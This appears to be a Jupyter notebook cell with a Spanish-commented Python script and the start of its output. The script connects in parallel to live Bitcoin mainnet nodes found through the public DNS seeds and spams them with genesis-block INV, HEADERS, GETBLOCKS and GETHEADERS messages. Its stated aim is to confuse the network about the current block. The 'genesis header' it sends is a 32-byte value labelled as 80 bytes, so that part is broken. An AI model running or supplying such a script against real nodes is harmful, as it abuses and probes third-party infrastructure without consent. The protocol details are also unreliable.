In [2]:
# 😈 BITCOIN GENESIS BLOCK SPAM - "El bloque actual es 0"
# Enviamos INV del bloque génesis como si fuera nuevo

import socket
import struct
import hashlib
import time
import random
from concurrent.futures import ThreadPoolExecutor, as_completed

MAINNET_MAGIC = 0xD9B4BEF9
PORT = 8333
PROTOCOL_VERSION = 70016

# Hash del bloque génesis de Bitcoin (bloque 0) - Satoshi lo minó
GENESIS_BLOCK_HASH = bytes.fromhex(
    "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f"
)[::-1]  # Little endian

DNS_SEEDS = [
    "seed.bitcoin.sipa.be",
    "dnsseed.bluematt.me",
    "dnsseed.bitcoin.dashjr.org",
    "seed.bitcoinstats.com",
    "seed.bitcoin.jonasschnelli.ch",
    "seed.btc.petertodd.org"
]

def double_sha256(data):
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()

def create_message(command, payload=b''):
    magic = struct.pack('<I', MAINNET_MAGIC)
    cmd = command.encode('ascii').ljust(12, b'\x00')
    length = struct.pack('<I', len(payload))
    chk = double_sha256(payload)[:4]
    return magic + cmd + length + chk + payload

def create_version_payload(height=0):
    """VERSION con altura 0 - 'Estoy en el bloque génesis'"""
    version = struct.pack('<i', PROTOCOL_VERSION)
    services = struct.pack('<Q', 1033)
    timestamp = struct.pack('<q', int(time.time()))
    addr_recv = struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', PORT)
    addr_from = struct.pack('<Q', 1) + b'\x00'*10 + b'\xff\xff' + b'\x00'*4 + struct.pack('>H', PORT)
    nonce = struct.pack('<Q', random.randint(0, 2**64-1))
    user_agent = b'\x10/GENESIS-LOVER:0/'  # User agent troll
    start_height = struct.pack('<i', height)  # ¡ALTURA 0!
    relay = struct.pack('<?', True)
    return version + services + timestamp + addr_recv + addr_from + nonce + user_agent + start_height + relay

def create_genesis_inv():
    """INV anunciando el bloque génesis como si fuera nuevo"""
    # MSG_BLOCK = 2
    inv_type = struct.pack('<I', 2)
    # 1 inventory entry
    count = b'\x01'
    return count + inv_type + GENESIS_BLOCK_HASH

def create_headers_payload():
    """
    Crear mensaje HEADERS con el bloque génesis
    Esto es lo que los nodos usan para sincronizar
    """
    # Header del bloque génesis (80 bytes)
    genesis_header = bytes.fromhex(
        "1f8c98a24f1dc2e22a18ce4218972ce83b7da4d54142d2ca0caeb05225dbc4a9"
    )

    # count (1) + header (80) + txn_count (0)
    count = b'\x01'
    txn_count = b'\x00'

    return count + genesis_header + txn_count

def create_block_locator():
    """
    Crear GETHEADERS/GETBLOCKS pidiendo desde el génesis
    Esto confunde a los nodos sobre nuestra posición
    """
    version = struct.pack('<I', PROTOCOL_VERSION)
    hash_count = b'\x01'
    # Solo el génesis
    block_locator = GENESIS_BLOCK_HASH
    hash_stop = b'\x00' * 32  # Hasta el final

    return version + hash_count + block_locator + hash_stop

def parse_message(data):
    if len(data) < 24:
        return None, None, data
    magic = struct.unpack('<I', data[:4])[0]
    if magic != MAINNET_MAGIC:
        return None, None, data
    command = data[4:16].rstrip(b'\x00').decode('ascii', errors='ignore')
    payload_len = struct.unpack('<I', data[16:20])[0]
    if len(data) < 24 + payload_len:
        return None, None, data
    payload = data[24:24+payload_len]
    remaining = data[24+payload_len:]
    return command, payload, remaining

def genesis_spam_node(ip, port):
    """Conectar con altura 0 y spamear génesis"""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(12)

    result = {
        'ip': ip,
        'success': False,
        'their_height': 0,
        'responses': []
    }

    try:
        sock.connect((ip, port))

        # Enviar VERSION con altura 0
        sock.send(create_message('version', create_version_payload(height=0)))

        buffer = b''
        handshake_done = False
        start = time.time()

        while time.time() - start < 8:
            try:
                data = sock.recv(4096)
                if not data:
                    break
                buffer += data

                while True:
                    cmd, payload, buffer = parse_message(buffer)
                    if cmd is None:
                        break

                    result['responses'].append(cmd)

                    if cmd == 'version':
                        # Extraer su altura
                        if len(payload) > 80:
                            try:
                                ua_len = payload[80]
                                offset = 81 + ua_len
                                result['their_height'] = struct.unpack('<i', payload[offset:offset+4])[0]
                            except:
                                pass
                        sock.send(create_message('verack'))

                    elif cmd == 'verack':
                        handshake_done = True

                    elif cmd == 'ping':
                        sock.send(create_message('pong', payload[:8]))

            except socket.timeout:
                if handshake_done:
                    break

        if not handshake_done:
            sock.close()
            return result

        result['success'] = True

        # ¡SPAM DEL GÉNESIS!

        # 1. INV del bloque génesis - "Tengo el bloque 0!"
        sock.send(create_message('inv', create_genesis_inv()))

        # 2. HEADERS con el génesis - "Aquí está el header del bloque 0"
        sock.send(create_message('headers', create_headers_payload()))

        # 3. GETBLOCKS desde génesis - "Dame bloques desde el 0"
        sock.send(create_message('getblocks', create_block_locator()))

        # 4. GETHEADERS desde génesis
        sock.send(create_message('getheaders', create_block_locator()))

        # Repetir para asegurar
        for _ in range(3):
            time.sleep(0.2)
            sock.send(create_message('inv', create_genesis_inv()))

        # Escuchar respuestas
        sock.settimeout(3)
        try:
            for _ in range(5):
                data = sock.recv(4096)
                if data:
                    buffer += data
                    while True:
                        cmd, payload, buffer = parse_message(buffer)
                        if cmd is None:
                            break
                        result['responses'].append(cmd)
        except:
            pass

        sock.close()
        return result

    except Exception as e:
        result['error'] = str(e)
        sock.close()
        return result

def main():
    print("""
╔══════════════════════════════════════════════════════════════════╗
║  😈 BITCOIN GENESIS BLOCK PROPAGANDA - "BLOQUE 0 ES EL ACTUAL"  ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  📦 Enviamos a los nodos:                                        ║
║     • VERSION con start_height=0 ("Estoy en el génesis")        ║
║     • INV del bloque génesis ("¡Tengo el bloque 0, es nuevo!")  ║
║     • HEADERS del génesis ("Aquí está el header")               ║
║     • GETBLOCKS/GETHEADERS desde 0 ("Sync desde génesis")       ║
║                                                                  ║
║  🎯 Objetivo: Confundir a la red sobre el estado actual         ║
║                                                                  ║
║  ⚠️ NOTA: Bitcoin ignorará esto pero procesará los mensajes     ║
╚══════════════════════════════════════════════════════════════════╝
    """)

    print("📡 Resolviendo DNS Seeds...")
    targets = []

    for seed in DNS_SEEDS:
        try:
            ips = socket.gethostbyname_ex(seed)[2]
            targets.extend([(ip, PORT) for ip in ips])
            print(f"   ✅ {seed}: {len(ips)} IPs")
        except Exception as e:
            print(f"   ❌ {seed}: {e}")

    targets = list(set(targets))
    random.shuffle(targets)
    print(f"\n🎯 {len(targets)} nodos objetivo")

    print(f"\n{'='*60}")
    print("🚀 PROPAGANDO 'BLOQUE 0 ES EL ACTUAL'")
    print(f"{'='*60}\n")

    results = []

    # Spam paralelo para máxima propagación
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {executor.submit(genesis_spam_node, ip, port): (ip, port)
                   for ip, port in targets[:20]}

        for future in as_completed(futures):
            ip, port = futures[future]
            try:
                result = future.result()
                results.append(result)

                if result['success']:
                    print(f"✅ {ip}")
                    print(f"   📦 Su altura real: {result['their_height']:,}")
                    print(f"   📨 Respuestas: {', '.join(result['responses'][:5])}")
                    print(f"   😈 Le dijimos que estamos en bloque 0!")
                else:
                    print(f"❌ {ip} - Falló conexión")

            except Exception as e:
                print(f"❌ {ip} - Error: {e}")

    # Estadísticas
    successful = [r for r in results if r['success']]
    heights = [r['their_height'] for r in successful if r['their_height'] > 0]



    # Ver qué respondieron
    all_responses = []
    for r in successful:
        all_responses.extend(r['responses'])

    if all_responses:
        print(f"\n   📨 RESPUESTAS RECIBIDAS:")
        from collections import Counter
        for cmd, count in Counter(all_responses).most_common(10):
            print(f"      • {cmd}: {count} veces")

    print(f"\n{'='*60}")
    print("   🎭 GÉNESIS HASH (lo que spameamos):")
    print(f"   {GENESIS_BLOCK_HASH[::-1].hex()}")
    print(f"{'='*60}\n")

main()


╔══════════════════════════════════════════════════════════════════╗
║  😈 BITCOIN GENESIS BLOCK PROPAGANDA - "BLOQUE 0 ES EL ACTUAL"  ║
╠══════════════════════════════════════════════════════════════════╣
║                                                                  ║
║  📦 Enviamos a los nodos:                                        ║
║     • VERSION con start_height=0 ("Estoy en el génesis")        ║
║     • INV del bloque génesis ("¡Tengo el bloque 0, es nuevo!")  ║
║     • HEADERS del génesis ("Aquí está el header")               ║
║     • GETBLOCKS/GETHEADERS desde 0 ("Sync desde génesis")       ║
║                                                                  ║
║  🎯 Objetivo: Confundir a la red sobre el estado actual         ║
║                                                                  ║
║  ⚠️ NOTA: Bitcoin ignorará esto pero procesará los mensajes     ║
╚══════════════════════════════════════════════════════════════════╝
    
📡 Resolviendo DNS Seeds...
   ✅ seed.b